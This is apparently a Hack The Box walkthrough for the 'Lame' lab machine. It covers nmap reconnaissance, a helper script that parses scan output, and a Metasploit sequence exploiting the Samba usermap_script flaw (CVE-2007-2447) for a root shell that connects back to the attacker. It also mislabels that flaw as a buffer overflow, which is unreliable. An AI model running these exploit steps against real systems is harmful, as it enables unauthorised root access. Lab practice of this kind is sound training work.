Lame
Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.
Walkthrough
Reconnaissance
We will start by scanning the target machine for open ports and services; this can be divided into three phases:
- Scan for open ports
- Scan for services in these open ports
- Scan for vulnerabilities in these services
Let’s start by scanning for open ports:
sudo nmap -sS -sU 10.10.10.3 -p- -T4 --min-rate 5000 -oG all_ports.txt --open -n -Pn
There are 5 open ports:
- 21/tcp
- 22/tcp
- 139/tcp
- 445/tcp
- 3632/tcp
Let’s check which services are running on these ports:
sudo nmap -sS 10.10.10.3 -p 21,22,139,445,3632 -T4 --min-rate 5000 -oX open_ports.xml -oN open_ports.txt --version-all -n -Pn -A -v
We can see that the services correspond to:
- 21/tcp vsftpd 2.3.4
- 22/tcp OpenSSH 4.7p1
- 139/tcp Samba smbd 3.X - 4.X
- 445/tcp Samba smbd 3.0.20
- 3632/tcp distccd v1 4.2.4
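As an added example (not part of the original writeup), the script below shows how the grepable (-oG) report written by the first scan can be turned into the port list the second scan expects, so the open ports do not have to be retyped by hand. The report it parses is a constructed sample laid out the way nmap writes all_ports.txt, with an extra UDP open|filtered entry added to show that only ports reported as exactly "open" are kept.

```shell
#!/bin/sh
# Added example (not from the original writeup): parse the grepable (-oG)
# report of the full-port scan and build the "-p" list for the service scan,
# so phase 1 feeds phase 2 without retyping ports. The report below is a
# constructed sample in the layout nmap writes; the real file is all_ports.txt.

# sample_gnmap: write a constructed -oG report to stdout (fields are tab-separated).
sample_gnmap() {
  printf '# Nmap scan initiated (constructed sample)\n'
  printf 'Host: 10.10.10.3 ()\tStatus: Up\n'
  printf 'Host: 10.10.10.3 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, '
  printf '139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, '
  printf '3632/open/tcp//distccd///, 137/open|filtered/udp//netbios-ns///'
  printf '\tIgnored State: filtered (65530)\n'
  printf '# Nmap done (constructed sample)\n'
}

# open_ports FILE: print "port/proto" for each port whose state is exactly "open".
# Each entry is port/state/proto/owner/service/rpc/version/; "open|filtered"
# (common for UDP) is deliberately left out because it is not confirmed open.
open_ports() {
  awk -F'\t' '/^Host:/ { for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) print substr($i, 8) }' "$1" \
    | tr ',' '\n' \
    | awk -F/ '{ sub(/^ +/, "", $1) } $2 == "open" { print $1 "/" $3 }'
}

# tcp_port_list FILE: comma-separated open TCP ports, ready for "nmap -p".
tcp_port_list() {
  open_ports "$1" | awk -F/ '$2 == "tcp" { print $1 }' | paste -sd, -
}

# Stand-alone run over the constructed sample.
REPORT=$(mktemp)
sample_gnmap > "$REPORT"
echo "open ports:"
open_ports "$REPORT"
echo "service scan: sudo nmap -sS 10.10.10.3 -p $(tcp_port_list "$REPORT") -T4 --version-all -n -Pn -A"
rm -f "$REPORT"
```

Replace sample_gnmap with the real all_ports.txt from the first scan and the printed command matches the second scan above with the port list filled in.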
Next we look for vulnerabilities in these services; however, the vulnerability scan didn’t return any useful information.
Foothold
This machine was quite realistic for one reason, namely that everything was vulnerable:
- The FTP version (vsftpd 2.3.4) allowed an RCE; however, it was patched.
- The OpenSSH version allowed user enumeration, which I was able to perform; however, it didn’t return any useful information.
- The Samba version allowed a buffer overflow, which is what I used to get into the machine.
- The DistCC daemon should have allowed an RCE; however, it was patched.
I tried every possible working exploit until I found the Samba one, which happened to be the last one I tried. The exploit leverages CVE-2007-2447. I found a script in un4gi’s repository, but it did not work for me; I still encourage everyone to try it, as the other tool we can use is Metasploit.
We can run Metasploit and configure it by running the following commands:
sudo msfdb run
use exploit/multi/samba/usermap_script
set lhost tun0
set rhost 10.10.10.3
run
We should now be logged in as the root user.
We can sanitize the shell and then print the flags:
script /dev/null -c /bin/bash